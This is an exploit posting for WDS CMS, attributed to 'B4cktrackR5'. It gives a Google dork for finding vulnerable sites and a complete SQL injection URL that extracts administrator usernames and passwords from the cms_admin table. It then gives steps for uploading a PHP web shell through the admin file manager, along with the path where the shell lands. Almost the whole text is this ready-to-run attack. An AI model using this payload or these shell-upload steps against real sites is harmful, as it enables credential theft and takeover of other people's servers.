WDS CMS - SQL Injection Exploit
Posted on 30 November -0001
<HTML><HEAD><TITLE>WDS CMS - SQL Injection Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># ( In The Name Of God ) # Exploit Title : WDS CMS - SQL Injection # Google Dork : allinurl:wds_news/article.php?ID= # Date : 2016-04-12 # Exploit Author : B4cktrackR5 # Tested on : Windows 7 , windows 8.1 Exploit : http://[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin-- Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file Shell Path : http://[Target]/wds_news/filer/shell.php # #### #### #### #### #### #### #### #### # # Email : <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="690b5d0a021d1b080a021b5c290e04080005470a0604">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> # #### #### #### #### #### #### #### #### #</BODY></HTML>
